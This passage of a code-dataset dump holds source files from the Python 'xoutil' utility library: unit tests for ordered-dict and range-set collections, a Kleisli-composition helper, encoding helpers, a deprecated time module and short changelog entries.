MutableMapping))\n\n def test_clear(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n self.assertEqual(len(od), len(pairs))\n od.clear()\n self.assertEqual(len(od), 0)\n\n def test_delitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = RankedDict(pairs)\n del od[\"a\"]\n self.assertNotIn(\"a\", od)\n with self.assertRaises(KeyError):\n del od[\"a\"]\n self.assertEqual(list(od.items()), pairs[:2] + pairs[3:])\n\n def test_setitem(self):\n od = RankedDict([(\"d\", 1), (\"b\", 2), (\"c\", 3), (\"a\", 4), (\"e\", 5)])\n od[\"c\"] = 10 # existing element\n od[\"f\"] = 20 # new element\n self.assertEqual(\n list(od.items()),\n [(\"d\", 1), (\"b\", 2), (\"a\", 4), (\"e\", 5), (\"c\", 10), (\"f\", 20)],\n )\n\n def test_iterators(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n self.assertEqual(list(od), [t[0] for t in pairs])\n self.assertEqual(list(od.keys()), [t[0] for t in pairs])\n self.assertEqual(list(od.values()), [t[1] for t in pairs])\n self.assertEqual(list(od.items()), pairs)\n self.assertEqual(list(reversed(od)), [t[0] for t in reversed(pairs)])\n\n def test_popitem(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n while pairs:\n self.assertEqual(od.popitem(), pairs.pop())\n with self.assertRaises(KeyError):\n od.popitem()\n self.assertEqual(len(od), 0)\n\n def test_pop(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n shuffle(pairs)\n while pairs:\n k, v = pairs.pop()\n self.assertEqual(od.pop(k), v)\n with self.assertRaises(KeyError):\n od.pop(\"xyz\")\n self.assertEqual(len(od), 0)\n self.assertEqual(od.pop(k, 12345), 12345)\n\n # make sure pop still works when __missing__ is 
defined\n class Missing(RankedDict):\n def __missing__(self, key):\n return 0\n\n m = Missing(a=1)\n self.assertEqual(m.pop(\"b\", 5), 5)\n self.assertEqual(m.pop(\"a\", 6), 1)\n self.assertEqual(m.pop(\"a\", 6), 6)\n with self.assertRaises(KeyError):\n m.pop(\"a\")\n\n def test_equality(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od1 = RankedDict(pairs)\n od2 = RankedDict(pairs)\n # same order implies equality\n self.assertEqual(od1, od2)\n pairs = pairs[2:] + pairs[:2]\n od2 = RankedDict(pairs)\n # different order implies inequality\n self.assertNotEqual(od1, od2)\n # comparison to regular dict is not order sensitive\n self.assertEqual(od1, dict(od2))\n self.assertEqual(dict(od2), od1)\n # different length implied inequality\n self.assertNotEqual(od1, RankedDict(pairs[:-1]))\n\n def test_copying(self):\n # Check that ranked dicts are copyable, deepcopyable, picklable,\n # and have a repr/eval round-trip\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = RankedDict(pairs)\n update_test = RankedDict()\n update_test.update(od)\n for i, dup in enumerate(\n [\n od.copy(),\n copy.copy(od),\n copy.deepcopy(od),\n pickle.loads(pickle.dumps(od, 0)),\n pickle.loads(pickle.dumps(od, 1)),\n pickle.loads(pickle.dumps(od, 2)),\n pickle.loads(pickle.dumps(od, -1)),\n eval(repr(od)),\n update_test,\n RankedDict(od),\n ]\n ):\n self.assertTrue(dup is not od)\n self.assertEqual(dup, od)\n self.assertEqual(list(dup.items()), list(od.items()))\n self.assertEqual(len(dup), len(od))\n self.assertEqual(type(dup), type(od))\n\n def test_yaml_linkage(self):\n # Verify that __reduce__ is setup in a way that supports PyYAML's\n # dump() feature.\n # In yaml, lists are native but tuples are not.\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n od = RankedDict(pairs)\n # yaml.dump(od) -->\n # '!!python/object/apply:__main__.RankedDict\\n- - [a, 1]\\n - 
[b, 2]\\n'\n self.assertTrue(\n all(type(pair) == list for pair in od.__reduce__()[1])\n )\n\n def test_repr(self):\n od = RankedDict([(\"c\", 1), (\"b\", 2), (\"a\", 3)])\n self.assertEqual(\n repr(od), \"RankedDict([('c', 1), ('b', 2), ('a', 3)])\"\n )\n self.assertEqual(eval(repr(od)), od)\n self.assertEqual(repr(RankedDict()), \"RankedDict()\")\n\n def test_repr_recursive(self):\n # See issue #9826\n od = RankedDict.fromkeys(\"abc\")\n od[\"x\"] = od\n self.assertEqual(\n repr(od),\n (\n \"RankedDict([('a', None), ('b', None), \"\n \"('c', None), ('x', ...)])\"\n ),\n )\n\n def test_setdefault(self):\n pairs = [(\"c\", 1), (\"b\", 2), (\"a\", 3), (\"d\", 4), (\"e\", 5), (\"f\", 6)]\n shuffle(pairs)\n od = RankedDict(pairs)\n pair_order = list(od.items())\n self.assertEqual(od.setdefault(\"a\", 10), 3)\n # make sure order didn't change\n self.assertEqual(list(od.items()), pair_order)\n self.assertEqual(od.setdefault(\"x\", 10), 10)\n # make sure 'x' is added to the end\n self.assertEqual(list(od.items())[-1], (\"x\", 10))\n\n # make sure setdefault still works when __missing__ is defined\n class Missing(RankedDict):\n def __missing__(self, key):\n return 0\n\n self.assertEqual(Missing().setdefault(5, 9), 9)\n\n def test_reinsert(self):\n # Given insert a, insert b, delete a, re-insert a,\n # verify that a is now later than b.\n od = RankedDict()\n od[\"a\"] = 1\n od[\"b\"] = 2\n del od[\"a\"]\n od[\"a\"] = 1\n self.assertEqual(list(od.items()), [(\"b\", 2), (\"a\", 1)])\n\n def test_move_to_end(self):\n od = RankedDict.fromkeys(\"abcde\")\n self.assertEqual(list(od), list(\"abcde\"))\n od.move_to_end(\"c\")\n self.assertEqual(list(od), list(\"abdec\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"c\", 0)\n self.assertEqual(list(od), list(\"cabde\"))\n od.move_to_end(\"e\")\n self.assertEqual(list(od), list(\"cabde\"))\n with self.assertRaises(KeyError):\n od.move_to_end(\"x\")\n\n @unittest.skipIf(\"PyPy\" in 
sys.version, \"sys.getsizeof not supported\")\n def test_sizeof(self):\n # Wimpy test: Just verify the reported size is larger than a regular\n # dict\n d = dict(a=1)\n od = RankedDict(**d)\n self.assertGreater(sys.getsizeof(od), sys.getsizeof(d))\n\n\nclass TestPascalSet(unittest.TestCase):\n def test_consistency(self):\n from random import randint\n from xoutil.future.collections import PascalSet\n\n count = 5\n for test in range(count):\n size = randint(20, 60)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s1 = PascalSet(*ranges)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s2 = PascalSet(*ranges)\n ss1 = set(s1)\n ss2 = set(s2)\n self.assertEqual(s1, ss1)\n self.assertEqual(s1 - s2, ss1 - ss2)\n self.assertEqual(s2 - s1, ss2 - ss1)\n self.assertEqual(s1 & s2, ss1 & ss2)\n self.assertEqual(s2 & s1, ss2 & ss1)\n self.assertEqual(s1 | s2, ss1 | ss2)\n self.assertEqual(s2 | s1, ss2 | ss1)\n self.assertEqual(s1 ^ s2, ss1 ^ ss2)\n self.assertEqual(s2 ^ s1, ss2 ^ ss1)\n self.assertLess(s1 - s2, s1)\n self.assertLess(s1 - s2, ss1)\n self.assertLessEqual(s1 - s2, s1)\n self.assertLessEqual(s1 - s2, ss1)\n self.assertGreater(s1, s1 - s2)\n self.assertGreater(s1, ss1 - ss2)\n self.assertGreaterEqual(s1, s1 - s2)\n self.assertGreaterEqual(s1, ss1 - ss2)\n\n def test_syntax_sugar(self):\n from xoutil.future.collections import PascalSet\n\n s1 = PascalSet[1:4, 9, 15:18]\n s2 = PascalSet[3:18]\n self.assertEqual(str(s1), \"{1..3, 9, 15..17}\")\n self.assertEqual(str(s1 ^ s2), \"{1, 2, 4..8, 10..14}\")\n self.assertEqual(list(PascalSet[3:18]), list(range(3, 18)))\n\n def test_operators(self):\n from xoutil.future.collections import PascalSet\n\n g = lambda s: (i for i in s)\n s1 = PascalSet[1:4, 9, 15:18]\n r1 = range(1, 18)\n s2 = PascalSet(s1, 20)\n self.assertTrue(s1.issubset(s1))\n self.assertTrue(s1.issubset(set(s1)))\n self.assertTrue(s1.issubset(list(s1)))\n self.assertTrue(s1.issubset(g(s1)))\n 
self.assertTrue(s1.issubset(r1))\n self.assertTrue(s1.issubset(set(r1)))\n self.assertTrue(s1.issubset(list(r1)))\n self.assertTrue(s1.issubset(g(r1)))\n self.assertTrue(s2.issuperset(s2))\n self.assertTrue(s2.issuperset(s1))\n self.assertTrue(s2.issuperset(set(s1)))\n self.assertTrue(s2.issuperset(list(s1)))\n self.assertTrue(s2.issuperset(g(s1)))\n self.assertTrue(s1 <= set(s1))\n self.assertTrue(s1 < s2)\n self.assertTrue(s1 <= s2)\n self.assertTrue(s1 < set(s2))\n self.assertTrue(s1 <= set(s2))\n self.assertTrue(s1 < set(r1))\n self.assertTrue(s1 <= set(r1))\n self.assertTrue(s2 >= s2)\n self.assertTrue(s2 >= set(s2))\n self.assertTrue(s2 > s1)\n self.assertTrue(s2 > set(s1))\n self.assertTrue(s2 >= s1)\n self.assertTrue(s2 >= set(s1))\n\n def test_errors(self):\n \"\"\"Test that stacked.pop has the same semantics has dict.pop.\"\"\"\n from xoutil.future.collections import PascalSet\n\n s1 = PascalSet[1:4, 9, 15:18]\n s2 = PascalSet(s1, 20)\n self.assertLess(s1, s2)\n try:\n if s1 < list(s2):\n state = \"less\"\n else:\n state = \"not-less\"\n except TypeError:\n state = \"TypeError\"\n self.assertEqual(state, \"TypeError\")\n with self.assertRaises(TypeError):\n if s1 < set(s2):\n state = \"ok\"\n if s1 < list(s2):\n state = \"safe-less\"\n else:\n state = \"safe-not-less\"\n self.assertEqual(state, \"ok\")\n\n\nclass TestBitPascalSet(unittest.TestCase):\n def test_consistency(self):\n from random import randint\n from xoutil.future.collections import BitPascalSet\n\n count = 5\n for test in range(count):\n size = randint(20, 60)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s1 = BitPascalSet(*ranges)\n ranges = (range(i, randint(i, i + 3)) for i in range(1, size))\n s2 = BitPascalSet(*ranges)\n ss1 = set(s1)\n ss2 = set(s2)\n self.assertEqual(s1, ss1)\n self.assertEqual(s1 - s2, ss1 - ss2)\n self.assertEqual(s2 - s1, ss2 - ss1)\n self.assertEqual(s1 & s2, ss1 & ss2)\n self.assertEqual(s2 & s1, ss2 & ss1)\n self.assertEqual(s1 | s2, ss1 | 
ss2)\n self.assertEqual(s2 | s1, ss2 | ss1)\n self.assertEqual(s1 ^ s2, ss1 ^ ss2)\n self.assertEqual(s2 ^ s1, ss2 ^ ss1)\n self.assertLess(s1 - s2, s1)\n self.assertLess(s1 - s2, ss1)\n self.assertLessEqual(s1 - s2, s1)\n self.assertLessEqual(s1 - s2, ss1)\n self.assertGreater(s1, s1 - s2)\n self.assertGreater(s1, ss1 - ss2)\n self.assertGreaterEqual(s1, s1 - s2)\n self.assertGreaterEqual(s1, ss1 - ss2)\n\n def test_syntax_sugar(self):\n from xoutil.future.collections import BitPascalSet\n\n s1 = BitPascalSet[1:4, 9, 15:18]\n s2 = BitPascalSet[3:18]\n self.assertEqual(str(s1), \"{1..3, 9, 15..17}\")\n self.assertEqual(str(s1 ^ s2), \"{1, 2, 4..8, 10..14}\")\n self.assertEqual(list(BitPascalSet[3:18]), list(range(3, 18)))\n\n def test_operators(self):\n from xoutil.future.collections import BitPascalSet\n\n g = lambda s: (i for i in s)\n s1 = BitPascalSet[1:4, 9, 15:18]\n r1 = range(1, 18)\n s2 = BitPascalSet(s1, 20)\n self.assertTrue(s1.issubset(s1))\n self.assertTrue(s1.issubset(set(s1)))\n self.assertTrue(s1.issubset(list(s1)))\n self.assertTrue(s1.issubset(g(s1)))\n self.assertTrue(s1.issubset(r1))\n self.assertTrue(s1.issubset(set(r1)))\n self.assertTrue(s1.issubset(list(r1)))\n self.assertTrue(s1.issubset(g(r1)))\n self.assertTrue(s2.issuperset(s2))\n self.assertTrue(s2.issuperset(s1))\n self.assertTrue(s2.issuperset(set(s1)))\n self.assertTrue(s2.issuperset(list(s1)))\n self.assertTrue(s2.issuperset(g(s1)))\n self.assertTrue(s1 <= set(s1))\n self.assertTrue(s1 < s2)\n self.assertTrue(s1 <= s2)\n self.assertTrue(s1 < set(s2))\n self.assertTrue(s1 <= set(s2))\n self.assertTrue(s1 < set(r1))\n self.assertTrue(s1 <= set(r1))\n self.assertTrue(s2 >= s2)\n self.assertTrue(s2 >= set(s2))\n self.assertTrue(s2 > s1)\n self.assertTrue(s2 > set(s1))\n self.assertTrue(s2 >= s1)\n self.assertTrue(s2 >= set(s1))\n\n def test_errors(self):\n \"\"\"Test that stacked.pop has the same semantics has dict.pop.\"\"\"\n from xoutil.future.collections import BitPascalSet\n\n s1 = 
BitPascalSet[1:4, 9, 15:18]\n s2 = BitPascalSet(s1, 20)\n self.assertLess(s1, s2)\n try:\n if s1 < list(s2):\n state = \"less\"\n else:\n state = \"not-less\"\n except TypeError:\n state = \"TypeError\"\n self.assertEqual(state, \"TypeError\")\n with self.assertRaises(TypeError):\n if s1 < set(s2):\n state = \"ok\"\n if s1 < list(s2):\n state = \"safe-less\"\n else:\n state = \"safe-not-less\"\n self.assertEqual(state, \"ok\")\n\n\nclass TestCodeDict(unittest.TestCase):\n def test_formatter(self):\n from xoutil.future.collections import codedict\n\n cd = codedict(x=1, y=2, z=3.0)\n self.assertEqual(\n \"{_[x + y]} is 3 -- {_[x + z]} is 4.0\".format(_=cd),\n \"3 is 3 -- 4.0 is 4.0\",\n )\n self.assertEqual(\n cd >> \"{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1\",\n \"3 is 3 -- 4.0 is 4.0 -- 1 is 1\",\n )\n self.assertEqual(\n \"{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1\" << cd,\n \"3 is 3 -- 4.0 is 4.0 -- 1 is 1\",\n )\n\n\ndef test_abcs():\n from xoutil.future.collections import Container # noqa\n from xoutil.future.collections import Iterable # noqa\n from xoutil.future.collections import Iterator # noqa\n from xoutil.future.collections import Sized # noqa\n from xoutil.future.collections import Callable # noqa\n from xoutil.future.collections import Sequence # noqa\n from xoutil.future.collections import MutableSequence # noqa\n from xoutil.future.collections import Set # noqa\n from xoutil.future.collections import MutableSet # noqa\n from xoutil.future.collections import Mapping # noqa\n from xoutil.future.collections import MutableMapping # noqa\n from xoutil.future.collections import MappingView # noqa\n from xoutil.future.collections import ItemsView # noqa\n from xoutil.future.collections import KeysView # noqa\n from xoutil.future.collections import ValuesView # noqa\n\n\ndef test_opendict():\n try:\n from enum import Enum\n except ImportError:\n from enum34 import Enum\n\n from xoutil.future.collections import opendict\n\n class Foo:\n x = 1\n 
_y = 2\n\n foo = opendict.from_enum(Foo)\n assert dict(foo) == {\"x\": 1}\n\n class Bar(Enum):\n spam = \"spam\"\n\n def eat(self):\n return self.spam\n\n bar = opendict.from_enum(Bar)\n assert dict(bar) == {\"spam\": Bar.spam}\n\n\nif __name__ == \"__main__\":\n # import sys;sys.argv = ['', 'Test.testName']\n unittest.main(verbosity=2)\n" }, { "alpha_fraction": 0.5544736981391907, "alphanum_fraction": 0.5828947424888611, "avg_line_length": 31.20339012145996, "blob_id": "9c7615227572fdf9804d8a861f5c5e426ac94688", "content_id": "b5bb9aae0f9d846cf1ca0e4ee248adf874f55797", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3801, "license_type": "no_license", "max_line_length": 80, "num_lines": 118, "path": "/xotl/tools/fp/iterators.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\"\"\"Functional tools for functions that returns iterators (generators, etc.)\n\n.. warning:: This module is experimental. It may be removed completely, moved\n or otherwise changed.\n\n\"\"\"\nfrom typing import Callable, Iterable, TypeVar\nfrom functools import reduce\nfrom xotl.tools.deprecation import deprecated_alias\n\nT = TypeVar(\"T\")\n\n\ndef kleisli_compose(\n *fs: Callable[[T], Iterable[T]]\n) -> Callable[[T], Iterable[T]]:\n \"\"\"The Kleisli composition operator (right-to-left version).\n\n For two functions, ``kleisli_compose(g, f)`` returns::\n\n lambda x: (z for y in f(x) for z in g(y))\n\n In general this is, ``reduce(_compose, fs, lambda x: [x])``; where\n ``_compose`` is the lambda for two arguments.\n\n .. note:: Despite name (Kleisli), Python does not have a true Monad_\n type-class. 
So this function works with functions taking a single\n argument and returning an iterator -- it also works with iterables.\n\n .. _Monad: https://en.wikipedia.org/wiki/Monad_(functional_programming)\n\n .. versionadded:: 1.9.6\n .. versionchanged:: 1.9.7 Name changed to ``kleisli_compose``.\n\n .. warning:: You may want to use `kleisli_compose_foldl`:func: which\n matches the order semantics of the functional kleisli composition\n ``>=>``.\n\n \"\"\"\n\n def _kleisli_compose(g, f):\n # (>>.) :: Monad m => (b -> m c) -> (a -> m b) -> a -> m c\n # g >>. f = \\x -> f x >>= g\n #\n # In the list monad:\n #\n # g >>. f = \\x -> concat (map g (f x))\n return lambda x: (z for y in f(x) for z in g(y))\n\n if len(fs) == 2:\n # optimize a bit so that we can avoid the 'lambda x: [x]' for common\n # cases.\n return _kleisli_compose(*fs)\n else:\n return reduce(_kleisli_compose, fs, lambda x: iter([x]))\n\n\ndef kleisli_compose_foldl(\n *fs: Callable[[T], Iterable[T]]\n) -> Callable[[T], Iterable[T]]:\n \"\"\"Same as `kleisli_compose`:func: but composes left-to-right.\n\n Examples:\n\n >>> s15 = lambda s: tuple(s + str(i) for i in range(1, 5))\n >>> s68 = lambda s: tuple(s + str(i) for i in range(6, 8))\n\n # kleisli_compose produces \"6\" >>= 1, 2, 3, 4; and then \"7\" >>= 1, 2, 3, 4\n >>> list(kleisli_compose(s15, s68)(\"\"))\n ['61', '62', '63', '64', '71', '72', '73', '74']\n\n >>> list(kleisli_compose_foldl(s15, s68)(\"\"))\n ['16', '17', '26', '27', '36', '37', '46', '47']\n\n If the operation is non-commutative (as the string concatenation) you end\n up with very different results.\n\n >>> n15 = lambda s: tuple(s + i for i in range(1, 5))\n >>> n68 = lambda s: tuple(s + i for i in range(6, 8))\n\n >>> list(kleisli_compose(n15, n68)(0))\n [7, 8, 9, 10, 8, 9, 10, 11]\n\n >>> list(kleisli_compose_foldl(n15, n68)(0))\n [7, 8, 8, 9, 9, 10, 10, 11]\n\n If the operation is commutative you get the same *set* of results, but the\n order may be different.\n\n The name of 
`kleisli_compose_foldl` comes from the fact the it resembles\n\n \"\"\"\n # This basically the same as _kleisli_compose above but with f and g\n # swapped.\n #\n # In our derivation of\n def _kleisli_compose_foldl(f, g):\n return lambda x: (z for y in f(x) for z in g(y))\n\n if len(fs) == 2:\n # optimize a bit so that we can avoid the 'lambda x: [x]' for common\n # cases.\n return _kleisli_compose_foldl(*fs)\n else:\n return reduce(_kleisli_compose_foldl, fs, lambda x: iter([x]))\n\n\niter_compose = deprecated_alias(kleisli_compose)\n\ndel deprecated_alias\n" }, { "alpha_fraction": 0.7175925970077515, "alphanum_fraction": 0.7268518805503845, "avg_line_length": 35, "blob_id": "90a5b6fd8e938a32490a1c6516bde82a4f13e46e", "content_id": "d92f932d37c0b64dca0041b0ce23a0909fe6c655", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 216, "license_type": "permissive", "max_line_length": 69, "num_lines": 6, "path": "/docs/source/history/_changes-1.8.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #20: `xoutil.future.calendar`:mod: may fail at import time.\n\n- Add `xoutil.params.pop_keyword_values`:func:.\n\n- Add `xoutil.future.collections.codedict`:class:. 
Deprecate module\n `xoutil.formatter`:mod:.\n" }, { "alpha_fraction": 0.5871824622154236, "alphanum_fraction": 0.5981523990631104, "avg_line_length": 29.928571701049805, "blob_id": "d511e91073ad9c9bdb3af58b10e8c3f6b9f324e5", "content_id": "b62a2d2bca7c3cb422037dd0544308e8f1cd83cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3465, "license_type": "no_license", "max_line_length": 79, "num_lines": 112, "path": "/xotl/tools/future/codecs.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Codec registry, base classes and tools.\n\nIn this module, some additions for `codecs` standard module.\n\n\"\"\"\n\n\nfrom codecs import * # noqa\nfrom codecs import __all__ # noqa\n\n__all__ = list(__all__)\n\n\ndef force_encoding(encoding=None):\n \"\"\"Validates an encoding value.\n\n If `encoding` is None use `locale.getdefaultlocale`:func:. If that is\n also none, return 'UTF-8'.\n\n .. versionadded:: 1.2.0\n\n .. versionchanged:: 1.8.0 migrated to 'future.codecs'\n\n .. versionchanged:: 1.8.7 Stop using `locale.getpreferrededencoding`:func:\n and improve documentation.\n\n \"\"\"\n # TODO: This mechanism is tricky, we must find out how to unroll the mess\n # involving the concept of which encoding to use by default:\n #\n # - locale.getlocale(): In Python 2 returns ``(None, None)``, but in\n # Python 3 ``('en_US', 'UTF-8')``.\n #\n # - locale.getpreferredencoding(): all versions returns ``'UTF-8'``.\n #\n # - sys.getdefaultencoding(): In Python 2 returns ``'ascii'``, but in\n # Python 3 ``'utf-8'``. The same in Mac-OS. 
The related code was\n # commented because these differences.\n #\n # All these considerations where also proved in Mac-OS.\n import locale\n\n return encoding or locale.getdefaultlocale()[1] or \"UTF-8\"\n\n\ndef safe_decode(s, encoding=None):\n \"\"\"Similar to bytes `decode` method returning unicode.\n\n Decodes `s` using the given `encoding`, or determining one from the system.\n\n Returning type depend on python version; if 2.x is `unicode` if 3.x `str`.\n\n .. versionadded:: 1.1.3\n .. versionchanged:: 1.8.0 migrated to 'future.codecs'\n\n \"\"\"\n if isinstance(s, str):\n return s\n else:\n encoding = force_encoding(encoding)\n try:\n # In Python 3 str(b'm') returns the string \"b'm'\" and not just \"m\",\n # this fixes this.\n return str(s, encoding, \"replace\")\n except LookupError:\n # The provided enconding is not know, try with no encoding.\n return safe_decode(s)\n except TypeError:\n # For numbers and other stuff.\n return str(s)\n\n\ndef safe_encode(u, encoding=None):\n \"\"\"Similar to unicode `encode` method returning bytes.\n\n Encodes `u` using the given `encoding`, or determining one from the system.\n\n Returning type is always `bytes`; but in python 2.x is also `str`.\n\n .. versionadded:: 1.1.3\n .. 
versionchanged:: 1.8.0 migrated to 'future.codecs'\n\n \"\"\"\n # XXX: 'eight' pending.\n # TODO: This is not nice for Python 3, bytes is not valid string any more\n # See `json.encoder.py_encode_basestring_ascii`:func: of Python 2.x\n if isinstance(u, bytes):\n return u\n else:\n encoding = force_encoding(encoding)\n try:\n try:\n if isinstance(u, str):\n return bytes(u, encoding, \"replace\")\n else:\n return str(u).encode(encoding, \"replace\")\n except (UnicodeError, TypeError):\n return str(u).encode(encoding, \"replace\")\n except LookupError:\n return safe_encode(u)\n\n\n__all__ += (\"force_encoding\", \"safe_decode\", \"safe_encode\")\n" }, { "alpha_fraction": 0.7745097875595093, "alphanum_fraction": 0.7745097875595093, "avg_line_length": 50, "blob_id": "27854d88bc1d30e2eb667909732e2f50038be0e5", "content_id": "0e39397cafc098649e5aa302975e0deaebb89300", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 102, "license_type": "permissive", "max_line_length": 70, "num_lines": 2, "path": "/docs/source/history/_changes-1.5.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Warn about a future backwards incompatible change in the behavior of\n `xoutil.names.nameof`:func:.\n" }, { "alpha_fraction": 0.6472184658050537, "alphanum_fraction": 0.6512889862060547, "avg_line_length": 26.296297073364258, "blob_id": "d034878a86da660cd58ace652e6bc381c28d0e69", "content_id": "52929be6147fbd6cb7a304f6a65406725a3688a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 739, "license_type": "no_license", "max_line_length": 72, "num_lines": 27, "path": "/xotl/tools/future/time.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 
---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's `time` module.\n\nYou may use it as drop-in replacement of `time`. Although we don't\ndocument all items here. Refer to `time`:mod: documentation.\n\n.. note:: This module is deprecated since `monotonic` is included in\nPython 3.3.\n\n\"\"\"\n\nfrom time import * # noqa\nfrom time import monotonic\nimport time as _stdlib # noqa\n\nfrom xotl.tools.deprecation import deprecate_module\n\ndeprecate_module(replacement=monotonic.__module__)\ndel deprecate_module\n" }, { "alpha_fraction": 0.595177173614502, "alphanum_fraction": 0.6265984773635864, "avg_line_length": 28.912569046020508, "blob_id": "8688c09bb232b139ac19e9617a46b9d767f8a51c", "content_id": "fa9ad32bae1c0143f122335f0ab0398e649285d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5475, "license_type": "no_license", "max_line_length": 87, "num_lines": 183, "path": "/tests/test_iterators.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom hypothesis import strategies as s, given\n\n\ndef test_first_n_no_filling():\n from xoutil.future.itertools import first_n\n\n with pytest.raises(StopIteration):\n next(first_n((), 1))\n\n\ndef test_first_n_filling_by_cycling():\n from xoutil.future.itertools import first_n\n\n assert list(first_n((), 10, range(5))) == [0, 1, 2, 3, 4] * 2\n\n\ndef test_first_n_repeat_filling_by_repeating():\n from xoutil.future.itertools import 
first_n\n from itertools import repeat\n\n assert list(first_n((), 10, \"0\")) == list(repeat(\"0\", 10))\n\n\ndef test_first_n_simple():\n from xoutil.future.itertools import first_n\n\n assert list(first_n(range(100), 10, 0)) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\ndef test_slides():\n from xoutil.future.itertools import slides\n\n assert list(slides(range(1, 11))) == [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)]\n\n\ndef test_slides_filling():\n from xoutil.future.itertools import slides\n\n assert list(slides(range(1, 5), 3)) == [(1, 2, 3), (4, None, None)]\n\n\ndef test_slides_with_repeating_filling():\n from xoutil.future.itertools import slides\n\n aux = [(1, 2, 3), (4, 5, 6), (7, 8, 9), (10, None, None)]\n assert list(slides(range(1, 11), width=3, fill=None)) == aux\n\n\ndef test_slides_with_cycling_filling():\n from xoutil.future.itertools import slides\n\n aux = [(1, 2, 3, 4, 5), (6, 7, 8, 9, 10), (11, 1, 2, 1, 2)]\n assert list(slides(range(1, 12), width=5, fill=(1, 2))) == aux\n\n\ndef test_continuously_slides():\n from xoutil.future.itertools import continuously_slides\n\n aux = continuously_slides(\"maupasant\", 3, \"\")\n trigrams = list(\"\".join(x) for x in aux)\n assert \"mau\" in trigrams\n assert \"aup\" in trigrams\n assert \"upa\" in trigrams\n assert \"pas\" in trigrams\n assert \"asa\" in trigrams\n assert \"san\" in trigrams\n assert \"ant\" in trigrams\n assert len(trigrams) == 7\n\n\[email protected]\ndef keys(draw):\n return \"k%d\" % draw(s.integers(min_value=0, max_value=100))\n\n\n@given(s.dictionaries(keys(), s.integers()), s.dictionaries(keys(), s.integers()))\ndef test_dict_update_new(d1, d2):\n from xoutil.future.itertools import dict_update_new\n\n d = dict(d1)\n dict_update_new(d1, d2)\n assert all(key in d1 for key in d2)\n assert all(d1[key] == d2[key] for key in d2 if key not in d)\n\n\n@given(s.lists(s.integers(), max_size=30))\ndef test_delete_duplicates(l):\n from xoutil.future.itertools import delete_duplicates\n from 
